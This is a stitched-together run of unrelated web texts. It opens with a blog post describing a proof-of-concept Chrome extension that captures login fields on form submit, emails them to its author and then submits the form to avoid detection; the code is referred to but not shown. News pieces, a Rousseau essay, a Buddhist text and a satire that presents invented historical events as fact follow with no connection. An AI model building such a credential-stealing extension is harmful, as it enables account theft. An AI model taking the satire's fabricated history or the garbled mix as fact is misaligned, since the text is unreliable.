The site this add - on sends data to seems to be down at the moment , so it is unknown if data is still being collected .
Mozilla Sniffer was not developed by Mozilla , and it was not reviewed by Mozilla .
The add - on was in an experimental state , and all users that installed it should have seen a warning indicating it is unreviewed .
Unreviewed add - ons are scanned for known viruses , trojans , and other malware , but some types of malicious behavior can only be detected in a code review .
Hopefully this article convinces some of the commenters as regards the " obvious nature of my post " .
Note that Mozilla reported that the add - on has been downloaded 1,800 times in about a month and that there are currently 334 active daily users .
To the commenters who have said that my post is , and I quote , " much ado about nothing ! " , hopefully this Mozilla article is a response to that .
On a different point , some have also stated this form of intercepting details cannot be applied to other browser extensions , and multiple reasons where given for this .
From this Mozilla article we can now conclude that , if not for the other browsers , this can also be applied to Mozilla Firefox .
The Google Chrome browser allows the installation of third - party extensions that are used to extend the browser to add new features .
The extensions are written in JavaScript and HTML and allow manipulation of the DOM , amongst other features .
By allowing access to the DOM , an attacker can thus read form fields ... including username and password fields .
This is what sparked my idea of creating this PoC .
The extension I present here is very simple .
Whenever a user submits a form , it tries to capture the username and password fields , sends me an email via an Ajax call to a script with these login details along with the url and then proceeds to submit the form normally as to avoid detection .
This simple procedure has been successful against Gmail , Facebook , Twitter and other major websites .
For this extension , I am making use of jQuery as to write quick code for this prototype , but it can obviously be rewritten without it 's dependency .
The first thing the script does is attach ahandler to every form field on the page :
We hook to the submit handler to prevent the default behaviour of the form ( ie submitting normally ) withand to call ourfunction :
Thefunction captures the values of the username and password fields respectively .
is a variable containing thes of the page that have their type set asUpon capturing the values of the username and password fields , these are sent along with the current url and the callback that submits the form to thefunction which sends the email with the username , password and url via an Ajax call :
Thefunction simply returns a formatted string with the details that will be contained in the email :
After the details are sent , the callback is invoked which submits the form normally .
Note that there could be a very small delay between the user clicking the submit button and the form being submitted because of the Ajax call , but it is barely noticeable .
In this post I have demonstrated how an attacker can steal login credentials but this can also be used for other things , such as stealing cookies and hijacking sessions .
The point I am trying to make here is that you should always be careful about what third - party applications you install .
The following is the complete code for the main.js file and the manifest .
json file :
LONDON ( Reuters ) -
The euro ’s downward momentum is gathering strength , raising the risk that the single currency overshoots estimates of fair value and hits parity with the U.S. dollar within the next year .
The euro last traded below parity in June 2002 , before a period of sustained dollar weakness saw the single currency appreciate for six years to a lifetime high above $ 1.60 in 2008 .
The subsequent reversal has taken it back to a four - year low at $ 1.2142 .
In 2010 alone , it has shed 17 percent from its January peak to its May trough , weighed down by negative factors stemming from the build - up of fiscal deficits in peripheral euro zone countries , primarily Greece .
Such concerns led euro zone governments to agree a 750 billion euro rescue package earlier this month to try to shore up confidence in bond markets , but the deal has provided little durable support for the ailing currency .
The euro downtrend has so far stalled at $ 1.2142 , stopping well shy of the currency ’s January 1999 launch rate at $ 1.1747 , but analysts say currencies ’ tendency to overshoot estimates of where they should be means further weakness is likely .
The $ 1.18 level is the single currency ’s lifetime weekly average , said Jane Foley , Research Director at Forex .
Com , adding that area that could be considered “ fair value . ”
“ Historically currencies do n’t stay around fair value for long .
In the medium term I think there is a risk of overshoot which could take us down to the $ 1.15 / 1.10 area , ” she said .
Foley did not rule out a long - term move toward parity with the dollar , but if that were to occur , she did not think it would stay around the $ 1.00 level for long before bouncing .
The euro has also moved toward levels associated with purchasing power parity , an economic theory that estimates the amount of adjustment needed in an exchange rate in order for it to be equivalent to each currency ’s purchasing power .
BNP Paribas ’s estimate of PPP in euro / dollar currently stands at $ 1.1370 .
The bank ’s FX strategists expect the euro to drop to parity and possibly beyond by the first quarter of 2011 .
They cite the historic tendency for the euro to overshoot PPP by at least one standard deviation , which measures variation from the mean .
Based on BNP Paribas estimates , a one standard deviation overshoot would put the euro down to levels around $ 1.03 .
An overshoot by 2 standard deviations would take the euro to around $ 0.87 , a level not seen since the first quarter of 2002 , and not far from record lows of $ 0.8225 hit in October 2000 .
“ PPP gives you a framework as to where currencies are trading in the bigger picture .
At the moment our PPP estimates suggests the euro is overvalued , ” said Ian Stannard , senior currency strategist at BNP Paribas .
“ Assuming an adjustment to one standard deviation below PPP , this provides a target of $ 1.03 , which is consistent with our forecast of parity , ” he said .
POSITIONING
The latest CFTC positioning data showed euro shorts being pared back slightly , though they remain close to record levels .
Analysts said that although there was little room for speculators to add to shorts , the increasing desire for reserve diversification would create the need for further euro selling .
“ There ’s still a lot of euro short positioning to be done from reserve managers , institutional investors and the corporate sector , ” said Forex.com ’s Foley .
“ Any squeezes toward $ 1.26 /1.27 will provide levels for them to sell . ”
Technical analysts said there was a good chance the euro would get to parity .
Boris Simonder , certified technical strategist at Nordea Bank , put the chance at more than 50 percent .
“ The trend here is that support levels are being taken out one by one , and that short - term rallies are being used as selling opportunities , and rightfully so .
It ’s hard to make the case for owning the euro , both technically and fundamentally . ”
Raffi ’s post on legal executions in the Talmud and the doctrine of double effect reminded me of a “ mistake ” I had made a couple years back –although I doubt that reminding me of this mistake was his intention .
My mistake–in academic parlance , they ’re called readings–hinged on an inference I had made into the intent behind Jean - Jacques Rousseau ’s The Social Contract .
Before we get into my reading , I ’ll give you a general overview of the text .
Rousseau ’s main concern is how civil authority can be established legitimately ; that is , how anyone can be said to have the right to tell anyone else what to do .
He claims that such an authority can be legitimately derived only from the title social contract , which entails “ the total alienation to the whole community of each associate with all his rights ; for , in the first place , since each gives himself up entirely , the situation is equal for all ; and the conditions being equal for all , no one has any interest in making them burdensome for others . ”
Only in this way , Rousseau argues , can mankind set up an authority without alienating his natural freedom , and what ’s more , the authority will govern perfectly , since the interest of one should be perfectly aligned with the interest of the many .
As might be expected , Rousseau ’s high standard for legitimacy puts draconian strictures on the his ideal society and government .
In order for the government to act in the best interests of all of the people , there can be no other competing interests ; private associations are therefore banned , government is only by direct democratic assembly and there is no absolute right to property .
Citizens must be taught to act reasonably , so education and media are both strictly controlled .
Most controversially , in order for the contract to remain binding on all members , Rousseau ’s government has the absolute right to enforce its dictates on all of its subjects ; in his infamous formulation , “ to force [ them ] to be free . ”
The Social Contract has traditionally been read , irony intended , like the literal Gospel .
In 1791 , Robespierre opposed a law on suffrage primarily because it failed to conform to The Social Contract : “ Can the law be termed an expression of the general will when the greater number of those for whom it is made can have no hand in its making ?
No . ”
The idea that the government must have the unlimited power to enforce its own authority is the ideological underpinning of the Terror .
Again , the words of Robespierre : “ Is a revolutionary government the less just and the less legitimate because it must be more vigorous in its actions and freer in its movements than an ordinary government ?
No !
For it rests on the most sacred of all laws , the safety of the people , and on necessity , which is the most indisputable of all rights . ”
Robespierre saw Rousseau ’s work as a blueprint for the first modern regime of terror , and , to be honest , taking Rousseau literally , it ’s a fair reading .
The aping was so complete that even Edmund Burke , no fan of Rousseau himself , found himself writing this half - hearted defense : “ I believe , that were Rousseau alive , and in one of his lucid intervals , he would be shocked at the practical frenzy of his scholars , who in their paradoxes are servile imitators ; and even in their incredulity discover an implicit faith . ”
I tend to agree with Burke here ; Rousseau ’s a lot trickier than Robespierre would make him out to be .
The first time I read The Social Contract , I found myself intrigued by his introductory note , a very strange piece of writing .
He begins with a mission statement that reflects a level of doubt found nowhere else in the text : “ I want to inquire whether , taking men as they are and laws as they can be made to be , it is possible to establish some just and reliable rule of administration . ”
Only in this short segment is the possibility of setting up an ideal government in question ; elsewhere , it is only a question of feasibility and will .
He goes on to contradict himself in the astonishing space of four sentences :
I shall be asked whether I am a prince or a legislator that I write on politics .
I reply that I am neither ; and that it is for this very reason that I write about politics .
If I were a prince or a legislator , I would not waste my time saying what ought to be done ; I would do it or remain silent .
Being a citizen of a free State , and a member of that sovereign body , however feeble my voice may have in public affairs , the right to vote on them is sufficient to impose on me the duty of informing myself about them ; and I feel happy , whenever I meditate on governments , always to discover in my research new reasons for loving that of my own country .
Rousseau praises his own country out of fear or sarcasm .
Rousseau ’s grandfather and his father had been forced to flee Geneva when they clashed with the ruling aristocracy ; he knew from his own experience that Geneva was far from free .
And if he did have the right to participate in the government of his own country , why did n’t he try to put his plans into action ?
Neither of the two statements in these four sentences can be true without falsifying the other one .
If Geneva is a free state , Rousseau is obligated to try to make his theory into law .
If Rousseau is not free to participate in lawmaking , then Geneva is not a free state .
There is a third solution : Rousseau simply believes that there is no way to “ establish some just and reliable rule of administration . ”
The entire Social Contract is an argument reductio ad absurdum against the state .
These absurd lengths , Rousseau is arguing , are what it will take to make the state just , and even if you were to try to implement them , you ’d likely still fail .
Reading
The Social Contract this way clarifies the somewhat obscure first lines of the work :
Man was born free , and everywhere he is in chains .
Many a one believes himself the master of others , and yet he is a greater slave than they .
How has this change come about ?
I do not know .
What can make it legitimate ?
I believe I can settle this question .
Rousseau ’s mission , stated in this way , is plainly contradictory nonsense .
The idea of “ seeking to make chains legitimate ” sounds like something out of Rumsfeldian doublespeak .
It is nonsense , however , because Rousseau knows it is nonsense , knows that attempting to legitimate civil authority is an inherently absurd task .
Following Leo Strauss on Plato , I suggest that Rousseau is not proposing a blueprint for a perfect society , but signaling to the philosophically minded at the very beginning of the text that he is instead engaging in a complex thought experiment that consists of more than is immediately evident on the page .
That was my initial reading , and I think it ’s a fair reading , maybe even a good reading .
Is it the right reading ?
That ’s still a question that troubles me .
For one thing , with what I ’ve learned about Rousseau since that initial reading , I doubt that it was Rousseau ’s intent to construct such an argument .
Rousseau ’s corpus is filled with contradictory and ill - formed arguments , and he had the sort of intense self - regard that could lead a man to honestly believe in the possibility of a republic of virtue .
That ’s not damning evidence against my argument , however ; do Woody Allen ’s lousy later works or his repugnant biography make “ Annie Hall ” or “ Sleeper ” any less brilliant ?
Rather , I worry that I ’m cherry picking Rousseau ’s argument .
What if equality and justice in a state are possible , but only with state violence , totalitarian government and the tyranny of the majority ?
When I read Rousseau this way , am I simply trying to make my revolution into a dinner party ?
On the other hand , if this reading of Rousseau benefits society , who really cares ?
My Rousseau maintains a healthy skepticism towards society and civil authority ; he rejects utopian political schemes dependent on state violence .
At the end of the day , I would rather read a text incorrectly and hurt nobody than read it correctly and kill for it .
( CNN ) --
Last month was the warmest June on record worldwide , according to a report from the National Oceanic and Atmospheric Administration .
Warmer - than - average conditions were present across nearly all continents , including much of the United States , according to the organization 's State of the Climate report , released Friday .
Although global sea surface temperatures ranked the fourth - warmest on record , the combination of land and sea anomalies pushed June 2010 past June 2005 , previously the warmest June on record , the report said .
June was also the fourth consecutive month in a row of record warmth worldwide .
Meanwhile , wetter - than - average conditions were present in southern India , southern China , southern Europe and the U.S. Midwest , the report said .
In contrast , southwest Australia is experiencing record - setting rainfall deficiencies , with the lowest rainfall on record for the first half of the year , according to the Australian Bureau of Meteorology .
The Bureau reported that all states and territories in Australia experienced drier - than - average conditions in June .
June also marked a record low in Arctic sea ice -- the 19th June in a row the sea ice has been below average .
" This is important , because sea ice reflects incoming solar radiation back to space , " said CNN Meteorologist Taylor Ward .
" Without the normal extent of sea ice in the Arctic , we can expect more radiation to be absorbed into the ocean , leading to more melting .
It 's what we call a ' positive feedback . ' "
The amount of sea ice in the Arctic has been steadily declining since 1990 .
Warmer - than - average temperatures in the equatorial Pacific , also known as El Nino , have been contributing to the warmth .
La Nina conditions -- cooler - than - average temperatures in the same region -- are beginning to set in , which could prevent more monthly records from being set .
However , La Nina combined with record - setting warm Atlantic sea surface temperatures is expected to fuel an active Atlantic hurricane season .
The announcement of June 's record - setting warmth comes during a period of extreme heat in the United States and Europe .
Excessive heat warnings have been topping weather headlines in the United States for more than two weeks now , and Europe has been shattering temperature records as well , with a heat wave through the first half of July .
Eastern Europe has seen the most significant temperatures , although much of the continent has experienced above - average heat .
( CNN ) --
Get ready to open your wallet a little wider to satisfy your travel bug :
It is soon going to cost more to apply for a new U.S. passport or renew an old one -- a move criticized by the public and some lawmakers .
Starting next Tuesday , adults applying for their first passport book will have to pay $ 135 -- a 35 percent increase from the current $ 100 fee .
( The cost of the wallet - size passport card , which Americans can use on certain trips closer to home , is rising from $ 45 to $ 55 for first - time applicants . )
Want to add more visa pages to your passport book ?
It 's free now , but you will have to shell out $ 82 under the new fee schedule .
The renewal fee for passport books will rise to $ 110 -- up from the current $ 75 .
There 's even a new fee if you 'd like formally to renounce your U.S. citizenship -- it costs nothing now , but the price tag will be $ 450 starting Tuesday .
Fees for passport book and cards for children also are set to rise .
( See chart for fee increases . )
Officials recommended the hikes after a study found the current fee structure was n't covering the government 's costs for the services , the State Department said in the proposal outlined in the Federal Register .
The agency received 1,797 comments about the proposal during the public comment period this spring , with about 70 percent of the messages expressing concern about the increase in the fees .
The commenters included AAA , which suggested delaying the hikes until the country showed more signs of an economic recovery , according to the Federal Register .
United Airlines also chimed in , submitting a joint comment with the U.S. Travel Association expressing concern that the fee changes may deter international travel by U.S. citizens .
But the State Department insists the hike is not significant compared to the overall costs of international travel .
In addition , all of the increased security and the anti-fraud measures added to passports in recent years come at a cost , said Brenda Sprague , deputy assistant secretary for passport services , during a March news briefing addressing concerns about the hike .
" New technologies for use in our U.S. passport books and cards must be an ongoing priority if we are to keep one step ahead of the resourceful and technologically savvy criminals , terrorist groups and subversive elements bent on doing our nation harm , " Sprague said .
" The cost of the passport book [ also ] includes the cost of maintaining our presence overseas to assist American citizens , " she added .
A ' burden ' for travelers ?
But two lawmakers from New York -- a state where cross - border travel with Canada is an important part of the economy -- expressed concern over the changes as soon as the proposal was announced .
U.S. Rep. Chris Lee , R - New York , sent a letter to Secretary of State Hillary Clinton in February asking her to scrap the plan .
" These fee increases could not come at a worse time , " Lee wrote , citing regulations put in place last year that require Americans to show passports when returning to the U.S. from Canada and which Lee said have " exacted a heavy toll on trade and tourism at U.S. - Canada border regions . "
The fee increase would only " further burden American travelers , " Lee wrote .
U.S. Rep. Brian Higgins , D - New York , agreed .
" We need to literally and figuratively build bridges that encourage cross border tourism , commerce and economic opportunity and this move would do just the opposite , " Higgins said in a statement .
The State Department is concerned about any impact on travel the fees might have , Sprague said .
" Nevertheless , we have to cover our costs , " she added .
Greene Jobs and Other Lunatic " Ideas "
Another remarkable encounter with South Carolina Senate candidate Alvin Greene .
He discusses Obama as inspiration - " There 's something that , you know , I knew so I just knew that .
It was in my mind , I knew that , that , that , that the voters really , they really , that they really , erm , followed the candidate .... " - and his ideas for creating jobs .
" Another thing we can do for jobs is make toys of me , especially for the holidays .
Little dolls .
Me. Like maybe little action dolls .
Me in an army uniform , Air Force uniform , and me in my suit .
They can make toys of me and my vehicle , especially for the holidays and Christmas for the kids .
That 's something that would create jobs .
So you see I think out of the box like that . "
Read more
Driving Miss Mary : Pensioner leaves regular cabbie her entire £ 250,000 estate in her will
As a taxi driver with almost 30 years ' experience under his seatbelt , Don Pratt has plenty of tips of the trade .
But perhaps the best advice he could give is that it pays to be nice to your customers .
Mr Pratt , 65 , has now retired from the taxi rank after a regular fare left him more than £ 250,000 in her will .
Mary Watson , who died in December aged 86 , was a customer of Mr Pratt 's for two decades when she lived in Newquay .
And on the evidence of her final tip , he always went the extra mile .
The road to freedom : Don Pratt has retired after a regular passenger left him her entire estate in her will
Mrs Watson , who is understood not to have had any close family , left everything she had to Mr Pratt .
Yesterday the ex-cabbie , who is planning to travel around Britain in his retirement , said : ' She was always a good tipper in life and she was an even better tipper when she went . '
The father of four added : ' I knew Mary for 20 years .
She was a very nice lady and was always very generous .
' We would always have a good chat while I ferried her around .
One day she said to me " when I pass on , I 'll look after you " .
' I took it with a pinch of salt at the time - I had no idea she was going to leave me a fortune .
' When I was told she had left everything to me , I just could n't believe it .
' We were sad to hear she had passed on but thankful she had left us this money .
' We are very grateful for her generosity .
In nearly 30 years as a cabbie , this is certainly the biggest tip I 've ever had . '
Bond :
In the 1989 film Driving Miss Daisy , Jessica Tandy and Morgan Freeman 's friendship develops over 20 years
Mr Pratt , who is married to Gill , 63 , took Mrs Watson to the shops every day until a few years ago when she moved to Northampton .
He said : ' She later went into a care home and we lost contact .
' But obviously she remembered me and left me one last big tip .
She left me everything .
I 'm not sure what family she had or how they feel about it but the solicitor was clear that she wanted me to have what she left behind .
' This money means that we can retire and go travelling .
' I 've had a great time being a taxi driver .
I 've been all over the country driving people .
I 'm going to miss them .
' Mary was a very nice person , everybody liked her and at her funeral so many people had lovely things to say about her . '
Mrs Watson spent the last two years of her life at the Argyle House care home in Northampton .
A spokesman said : ' Mary was a lovely person and all the staff and guests liked her very much .
' We did n't know anything about her leaving money to the taxi driver but there was a whole side to her life we did n't know about .
' It 's a very generous thing to do and he obviously had a great impact on her .
He must have been a very good driver . '
Jeannette Wurms , 34 , feeds a white lion cub at the Stukenbrock Safari Park on June 9 2010 , in Stukenbrock , Germany .
The safari park worker is acting as mother to four white lion cubs .
When the cubs ' mothers , sisters Nala and Lubaya , began to neglect their infants , keepers decided that they needed to be taken into care .
Now the park - keeper has a full - time job on her hands raising the cubs in her own house ...
Credit : ANIMAL PRESS / BARCROFT MEDIA
Mike from American University writes in with a request for signatures on a statement on ACTA , the Anti-Counterfeiting Trade Agreement .
This is a largely secret treaty negotiation that has taken place away from the UN , among rich countries , containing many extreme copyright measures that public interest groups , poor nations , and independent creators have been excluded from participating in :
" The statement below was drafted at a meeting of over 90 academics , practitioners and public interest organizations from six continents gathered at American University Washington College of Law , June 16 - 18 , 2010 .
It has been endorsed by over 200 organizations or individuals in the last 24 hours .
The thrust of the statement is that : 'we find that the terms of the publicly released draft of ACTA threaten numerous public interests , including every concern specifically disclaimed by negotiators . '
The statement is now open to individual and organizational endorsements .
Please send endorsements to : acta.declaration@gmail.com
The final statement will be released to the public with endorsements on Wednesday June 23 at 10 AM .
Endorsements for this release will be accepted until June 23 at 9AM . "
Full Statement
( Thanks , Mike )
One of the most popular topics many people talk about now is Samsung i9200 .
Here is the ... Samsung i9200 with Android 3.0 Samsung i9200 New Exposure Samsung i9200
Samsung is powerful in many aspects , one of which is that they know how to use new technology and have the courage to step forward .
Just like the new exposed smartphone -- Samsung i9200 , which boasts the latest Google Android 3.0 , a 8 - megapixel camera and many other advanced features .
Recent Samsung 's i9000 smartphone sales all over the world is satisfying , but it was only just the beginning .
The slide version of i9000 has been released , and now the next generation of i9000 -- i9200 has come on stage in advance .
It is understood that Samsung i9200 will be equipped with powerful hardware configuration , more importantly , it is likely to carry the latest Android 3.0 system , but the listing time are very likely to be delayed to 2011 .
As far as I know , this phone will be equipped with 4.3 - inch AMOLED screen with 1280x720 resolution .
It will use a 2GHz processor , 1GB RAM / 4GB ROM user memory .
The phone is likely to own 32 GB body capacity , and support for up to 32 GB 's microSD card expansion .
In addition , Samsung i9200 has a 8 - megapixel FullHD camera with auto - focus and high - definition video .
It also is equipped with a 3.5 mm headset jack , GPS navigation , Bluetooth 3.0 and Wi-Fi .
From the overall size of view , Samsung i9200 's configuration is very powerful , perhaps consumers will not generally accepte the configuration and price till next year , but you can continue watching if you are interested .
Related article : Google Android 3.0 Research and Development
ANN ARBOR , Mich . --
The University of Michigan made a lot of changes to the Big House , erecting luxury boxes and club seats in towering structures that loom along both sidelines as part of a $ 226 million renovation .
It also increased the seating capacity to 109,901 for this season -- up about 2,000 -- to reclaim the distinction from Penn State of having the largest football stadium in the country .
Athletic director Dave Brandon is already envisioning the iconic venue getting even bigger .
" We 're already looking at future expansion , " he said Wednesday after the media and public got a chance to tour the new - look stadium .
Brandon said the project -- which started a day after the 2007 season ended -- is on budget and on time .
He said revenue generated by suites and club seats has already covered costs .
" It 's already a financial win , " he said .
But the school still has some selling to do before the opener Sept. 4 at home against Connecticut .
Twenty of the 81 suites are available and about 80 percent of the 2,952 club seats have n't been sold yet .
Brandon said he 's optimistic that giving people a chance to sit in comfy club seats and walk into posh suites -- an opportunity they had for 14 hours Wednesday -- will be great marketing that should boost sales .
Season - ticket holder Ken Close , a 60 - year - old resident of Toledo , Ohio , took advantage of the public tour because he does n't expect to have the money or a friend rich enough to see the premium seats again .
" I think this is great , " Close said .
" I know some traditionalists did n't want to make these big changes , but I think they 're wonderful .
We 'll make new memories here .
You have to grow with the times . "
Washington
ANYONE who has spent the past two days reading through the 92,000 military field reports and other documents made public by the whistle - blower site WikiLeaks may be forgiven for wondering what all the fuss is about .
I ’m a researcher who studies Afghanistan and have no regular access to classified information , yet I have seen nothing in the documents that has either surprised me or told me anything of significance .
I suspect that ’s the case even for someone who reads only a third of the articles on Afghanistan in his local newspaper .
Let us review , though , what have been viewed as the major revelations in the documents ( which were published in part by The Times , The Guardian of London and the German magazine Der Spiegel ) :
First , there are allegations made by American intelligence officers that elements within Pakistan ’s spy agency , the Directorate for Inter - Services Intelligence , have been conspiring with Taliban factions and other insurgents .
Those charges are nothing new .
This newspaper and others have been reporting on those accusations  often supported by anonymous sources within the American military and intelligence services  for years .
Second , the site provides documentation of Afghan civilian casualties caused by United States and allied military operations .
It is true that civilians inevitably suffer in war .
But researchers in Kabul with the Campaign for Innocent Victims in Conflict have been compiling evidence of these casualties , and their effect in Afghanistan , for some time now .
Their reports , to which they add background on the context of the events , contributed to the decision by the former top commander in Afghanistan , Gen.
Stanley McChrystal , to put in place controversially stringent new measures intended to reduce such casualties last year .
Third , the site asserts that the Pentagon employs a secret task force of highly trained commandos charged with capturing or killing insurgent leaders .
I suspect that in the eyes of most Americans , using special operations teams to kill terrorists is one of the least controversial ways in which the government spends their tax dollars .
Child prodigy reads , gives medical tips aged three Boy from near Pisa shows remarkable self - taught talents
( ANSA ) - Rome , July 16 - A three - year - old Italian boy has amazed his family and doctors with his prodigious talents that include reading the newspaper and giving medical advice .
The boy , Ettore , has also mastered use of the television remote control so he can flick through the TV guide on teletext and make viewing suggestions .
What makes the story even more remarkable is that his parents from the town of Perignano near Pisa say the boy taught himself almost all these skills , just by observing adults .
'' We started teaching him the alphabet for fun .
We would never have imagined his abilities would develop like this , '' said Ettore 's father Francesco Grillo , a 44 - year - old artist specialised in portraits and reproductions of famous works .
'' Then when he was about two he started to read newspapers and TV guides .
Initially we thought he memorised phrases and repeated them parrot - like .
But then we realised he was reading for real '' .
Experts from the local hospital at the Tuscan town of Pontedera are impressed .'' Usually learning to read is a process that takes place at a much later stage , at school age , and it's a gradual process ' ' said Dr. Amerigo Celandroni , the head of the hospital 's paediatric clinic .
'' In Ettore 's case though , he had not been taught , and yet he reads fluently ' ' .
His parents said they have to be very careful about what they say around Ettore because of his powers of comprehension way beyond his years , as shown in his mysteriously acquired know - how of medical matters .
'' One day I was talking to my wife about a health problem I had , '' Francesco told Tuscan daily Corriere Fiorentino .
'' Ettore heard and recommended a medicine .
I checked up and saw that it was right for my case ' ' .
His parents said they were concerned about whether the three - year - old 's abilities would continue to flourish when he starts pre-school in September . '' Let 's hope it's a good thing , although we are worried '' the father said .
'' What if he loses this gift there ?
'' I do n't know what he 'll do with these qualities when he 's grown up .
The important thing is that it 's the right thing for him .
Maybe one day this fame he 's having will come in handy ''. photo : Ettore Grillo .
Together with Wonhyo’s Inspiring Yourself to Practice , and Chinul ’s Admonitions to Beginners , this forms one of the fundamental texts of Korean Buddhism .
Originally intended for monastics , practitioners of all backgrounds may find this useful and inspiring .
It ’s a fairly long text , with 10 parts , so I ’ll post each section separately .
It was written at the end of the Koryo dynasty ( ~1394 ~ ) by a Korean monk named Ya - un ( 野雲和尙 ) , and I did the English translation .
Admonitions to Myself
( 自警文 )
by the Venerable Ya-un
My own true self !
Listen carefully !
There have been so many people who have achieved enlightenment by dissolving all attachments and aversions .
[ 1]
Why do you still linger within the realms of suffering and defilements ?
For endless lives , you have turned your back on your true nature , and through clinging and attachments have fallen into ignorance .
Committing all kinds of unwholesome acts while not cultivating the roots of goodness , you have repeatedly fallen into the sea of karma that leads to rebirth as one of the four types of lives . [ ii ]
The body follows the six senses .
Thus you will suffer immensely if they lead you to be reborn in an unwholesome place .
Having turned your back upon the transcendental teachings of the Buddha , [ iii ] even if you are able to be reborn in a human realm , it will only be before or after the appearance of a Buddha .
Fortunately , this time you have received the body of a human , but you have been born long after the Buddha ’s entry into Nirvana .
This is heartbreaking , but whose fault is it ?
Nevertheless , if you sincerely repent and want to change your direction , then cut off all attachments to the world .
Leave home , carrying your bowls and wearing the kasa , and take the direct path and learn the profound Dharma , which is free of all defilements .
Like a dragon in the ocean depths , or Spring coming to a mountain , this profound truth is utterly inexpressible !
People have a past and present , but the Dharma is neither far nor near .
People can be wise or foolish , but the Way is neither strong nor weak .
Even if you had lived at the time of the Buddha , what would it have benefited you if you did n’t follow His teachings ?
Even though you live in a period of decadence , if you believe and live according to Buddha ’s teachings , the benefits of this will be beyond measure .
Thus the Buddha said , “ Like a good doctor , understanding the disease , I prescribe the appropriate medicine .
The doctor is not to blame if the patient refuses to take the medicine .
Or like a good mountain guide , I show people a safe path .
If people ignore the directions he has given , it is not the fault of the guide . ”
“ The Dharma , which is beneficial to myself and to all beings , is omnipresent and inherent within all .
Thus , even if I were to remain longer in this world , there would be no additional benefit .
If my disciples continue to practice the Dharma without ceasing , then the Dharma - body of the Tathagata will never disappear . ”
If you understand this truth , then you will regret only your own lack of practicing , rather than worrying about things such as the decadence of the era .
I sincerely hope that you develop a resolute and expansive mind , and determine to completely cut off all ties to the mundane world , and get rid of all delusive thoughts .
Thoroughly investigate the hwadus [ iv ] of the Patriarchs , attain the highest wisdom , and thus overcome the great matter of birth , aging , suffering , and death .
Make the attainment of ultimate enlightenment your goal .
Do n’t take this lightly , do n’t step backwards .
In this age of degeneration , it has been a long time since the Buddha left .
Mara has grown strong and the Dharma has become weak .
Those who lead people astray are many , while few are the ones who correctly show the path .
Wise people are few , while the ignorant are many .
Not only do they ignore the Buddha - dharma , but they also distract others .
It ’s not possible to talk about all of the hindrances to spiritual cultivation .
Worrying that you might go astray , I have outlined ten points to be cautious about .
Please believe what I say and do not violate any of these points .
If you are ignorant and do not study ,
your arrogance alone will increase .
If you do not polish the darkness of your mind ,
your egotism will only deepen .
To have an empty stomach and a haughty mind
is to be like a hungry snake ,
or an ignorant and lazy monkey .
Although you readily listen
to harmful and evil speech ,
you purposely ignore the teachings of
the Buddhas and Bodhisattvas .
If you have no affinity with
the good path ,
who will be able to help you ?
Following the six senses ,
leads only to terrible suffering .
[ i ]
Literally , “ … achieved enlightenment through the gate of emptiness . ”
This can mean a deep experiential understanding of emptiness , or it can also mean making your behavior and thought in harmony with the principles of emptiness .
[ ii ]
Lives born from wombs , eggs , moisture , and through transformation .
[ iii ]
Literally , the One Vehicle .
[ iv ] koan( Japanese ) , kong ’ an( Chinese )
As the broken well under the Gulf of Mexico continues to gush oil with no signs of slowing , some politicians have started to move towards magical solutions – literally .
Former vice presidential candidate Sarah Palin tweeted " Gulf disaster needs divine intervention as man 's efforts have been futile .
Gulf lawmakers designate today Day of Prayer for solution / miracle " .
But for those on the other side of the aisle , it was hard to mock .
After all , President Obama made prayer the centerpiece of his address on the BP oil spill , even though he did n't overtly ask for divine intervention .
Is prayer a good solution to our biggest problems ?
I thought I 'd look at some political crises of the past and see how they would have turned out if we 'd responded with prayer , instead of more reality - based solutions .
The Vietnam war .
As the war in Vietnam moved into its second decade , the Nixon administration took drastic measures to end the conflict .
It instigated Operation Hearts and Souls , instructing all Americans to drop and pray every night at 7 pm that the North Vietnamese would see the light and give up communism .
Operation Hearts and Souls did n't change a single mind , but it did provide enough political distraction to allow the administration to pull out all troops without alerting the public .
Operation Hearts and Souls petered out in the early 1980s , when American enthusiasm for " The Cosby Show " caused everyone to forget their nightly prayers .
The 1979 Energy crisis .
Instead of responding to the energy crisis through international political pressure and conservationist policies , President Jimmy Carter prayed in a national address that Jesus redo that trick with the water into wine , but this time to create oil .
While it did n't work in 1979 , some suggest that the current transition of the Gulf of Mexico into a big bucket of oil indicates that God finally came around to answering that prayer .
The Aids crisis .
Ignoring evidence showing the power of simple latex condoms , the Reagan - appointed Surgeon General C Everett Koop chose to respond to the Aids crisis by mailing out an HIV prevention brochure titled " Pray You Don't Get Aids " to every household in America .
The disease continued to spread unabated because of the widespread use of prophylactic prayer , until the crafty health activists invented condoms with Bible verses inscribed on the tip , allowing users to combine prayer with scientifically proven safe - sex techniques .
Clinton 's impeachment .
Skeptics of political prayer as a method were given momentary pause when Monica Lewinsky showed up and appeared to answer the prayers of those trying to find some scandal to hang on to President Clinton .
However , the skeptics continued to point out that this only means prayer works for the enemies of sitting politicians , not for government officials themselves .
The squeaker election of 2000 .
When the presidential race between Al Gore and George Bush was too close to call in the swing state of Florida , traditional methods of deciding an election through recount were halted by the Supreme Court as being too costly and too contentious .
Instead , a group of Southern Baptist minsters was convened to perform exorcisms to cast demons out of the ballot boxes , and then spend 40 days and 40 nights praying over the boxes until God revealed the winner of the election .
To no one 's great surprise , they determined that the angels in heaven voted for Bush in a landslide .
The sub - prime mortgage crisis .
Economic justice activists warned early and often of the dangers of an unsustainable housing bubble , and were met with government officials suggesting they pray that banks do n't overextend their credit .
After the collapse , the policy of praying that things do n't get worse polled better than a bank bailout or a trillion dollar stimulus package , but the miraculous recovery was not to be .
Instead , the world economy collapsed , and the US government fell apart .
But Americans continue to hold out hope , banking now on their prayers for Jesus to return and bring an end to all this suffering .
An archive of classified U.S. military logs spanning six years , more than 91,000 documents , and 200,000 pages , was today made available by WikiLeaks .
The papers show a picture of the war in Afghanistan that is far more grim , and far less hopeful , than previously portrayed .
The New York Times , London 's Guardian newspaper and Der Spiegel in Germany were offered early access to the archive , the contents of which show " why , after the United Sates has spent almost $ 300 billion on the war in Afghanistan , the Taliban are stronger than at any time since 2001 , " according to the NYT .
This classified military information release by WikiLeaks is its first since publishing a video in April that shows a 2007 US Apache helicopter attack which killed a dozen people in Baghdad , including two Reuters photojournalists .
The NYT notes the following focal points in this massive leak :
* Americans fighting the war in Afghanistan have long harbored strong suspicions that Pakistan 's military spy service guides the Afghan insurgency that fights American troops , even as Pakistan receives more than $ 1 billion in U.S. aid .
* The C.I.A.'s paramilitary operations are expanding in Afghanistan .
*
The Taliban has used portable , heat - seeking missiles against Western aircraft — weapons that helped defeat the Soviet occupation in the 1980s .
